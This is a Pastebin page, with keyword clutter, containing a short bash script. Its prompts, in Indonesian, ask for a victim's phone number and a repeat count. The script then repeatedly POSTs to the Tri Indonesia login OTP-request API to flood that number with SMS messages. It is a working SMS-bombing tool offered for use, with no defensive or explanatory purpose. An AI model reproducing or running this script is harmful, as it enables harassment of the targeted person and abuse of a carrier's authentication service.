Pastebin

bonstri tri co id login

bonstri tri co id login from Pastebin

Registrasi tri co id Pastebin Tritri counties bank online login paste Tri star log in details
    
        #!/bin/bash

clear
read -p 'Masukkan nomor telepon yang ingin dispam :v  => ' notelp
read -p 'Masukkan jumlah spam sms :v => ' jumlhspam

i=0
for i in $(seq 1 "$jumlhspam") 
do
  STATUS=$(curl --fail -s -o /dev/null -w '%{http_code}' http://bonstri.tri.co.id/api/v1/login/request-otp -X POST -H 'User-Agent: akwowkwowowo :v' -H 'Content-Type: application/json' -d '{"msisdn":"'$notelp'"}' || exit 1)
  if [ ${STATUS} -eq 200 ]; then
    echo "[ $i .][success] send spam to $notelp !"
  else
    echo "[ $i .][failed] send spam to $notelp :( "
  fi
  sleep 2
done